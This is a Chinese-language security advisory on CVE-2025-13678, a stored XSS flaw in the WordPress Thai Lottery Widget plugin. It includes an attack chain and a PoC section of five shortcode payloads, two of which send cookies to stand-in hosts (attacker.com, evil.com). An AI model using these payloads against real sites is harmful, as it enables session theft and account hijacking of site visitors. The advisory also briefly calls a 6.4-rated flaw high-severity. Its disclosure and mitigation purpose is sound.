CVE-2025-13678 WordPress Thai Lottery Widget插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13678

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Thai Lottery Widget plugin for WordPress

漏洞概述

CVE-2025-13678是WordPress平台下Thai Lottery Widget插件的一个高危安全漏洞。该插件是一款用于在WordPress网站上显示泰国彩票开奖结果的工具插件。漏洞存在于插件处理短代码（shortcode）时，对用户输入的width和height参数缺乏充分的输入验证和输出转义处理，导致攻击者可以在页面中注入恶意JavaScript脚本代码。由于该漏洞属于存储型XSS（Stored Cross-Site Scripting），恶意代码会被永久存储在服务器端数据库中，所有访问含毒页面的用户都会自动执行攻击者植入的恶意脚本。攻击者利用此漏洞需要具备WordPress网站的Contributor级别或更高权限账户。虽然CVSS评分仅为6.4（中危），但存储型XSS漏洞的危害不容忽视，攻击者可借此窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或在网站上植入恶意重定向，对网站访问者和网站本身都构成严重安全威胁。

技术细节

该漏洞的根本原因在于Thai Lottery Widget插件在处理thailottery短代码时，对width和height参数的处理存在严重的输入验证缺陷。当用户在文章或页面中插入类似[thailottery width='100' height='200']的短代码时，插件会直接将用户提供的width和height值传递给前端渲染函数，而没有对这些值进行HTML实体转义或白名单验证。攻击者可以在这些参数中注入任意HTML标签或JavaScript脚本代码，例如：[thailottery width='" onmouseover="alert(document.cookie)" x="' height='100']。由于插件没有对这些输入进行sanitization处理，恶意代码会被直接写入到页面的HTML源代码中。当其他用户访问包含此短代码的页面时，浏览器会将其解析为正常的HTML/JavaScript代码并执行，从而触发XSS攻击。由于这是存储型XSS，恶意代码会永久存在于数据库中，除非手动删除或修改相关短代码，否则所有访问者都会受到影响。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用的WordPress版本和Thai Lottery Widget插件版本，确认版本号小于等于2.5

STEP 2

权限获取

攻击者通过钓鱼、密码爆破或社工手段获取WordPress网站的Contributor级别或更高权限账户

STEP 3

漏洞利用

攻击者创建或编辑文章/页面，在内容中插入带有XSS payload的thailottery短代码，如[thailottery width='100" onmouseover="alert(document.cookie)" x="' height='200']

STEP 4

代码持久化

恶意短代码随文章内容被永久存储在WordPress数据库中，无需攻击者再次操作

STEP 5

受害者触发

当其他用户（管理员、编辑、普通访客）访问包含恶意短代码的页面时，浏览器解析并执行注入的JavaScript代码

STEP 6

数据窃取

攻击者通过恶意脚本窃取用户会话Cookie、劫持账户或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13678 PoC - Thai Lottery Widget Stored XSS
// Author: Security Researcher
// Target: WordPress with Thai Lottery Widget plugin <= 2.5

// PoC 1: Basic XSS via width parameter
[thailottery width='100" onmouseover="alert(document.cookie)" x="' height='200']

// PoC 2: XSS via height parameter
[thailottery width='300' height='200" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)" x="']

// PoC 3: Combined XSS with event handler
[thailottery width='500px;expression(alert("XSS"))' height='300']

// PoC 4: Using JavaScript URI scheme
[thailottery width='javascript:alert(document.domain)' height='100']

// PoC 5: Cookie stealing payload
[thailottery width='100' height='200' onload='fetch("https://evil.com/log?c="+btoa(document.cookie))']

// Exploitation scenario:
// 1. Attacker with Contributor role creates/edits a post
// 2. Inserts malicious shortcode with XSS payload
// 3. Publishes or saves the post
// 4. Any user visiting the page will execute the injected JavaScript

影响范围

Thai Lottery Widget plugin for WordPress <= 2.5

防御指南

临时缓解措施

如果无法立即更新插件，可采取以下临时缓解措施：1）删除或禁用Thai Lottery Widget插件；2）限制Contributor及以上角色的用户创建和编辑文章的权限；3）使用WordPress安全插件（如Wordfence）添加临时防火墙规则，检测和阻止包含thailottery短代码中的可疑属性；4）实施严格的CSP策略限制内联脚本执行；5）考虑使用自定义代码替换插件功能，确保输入验证和输出转义正确实现。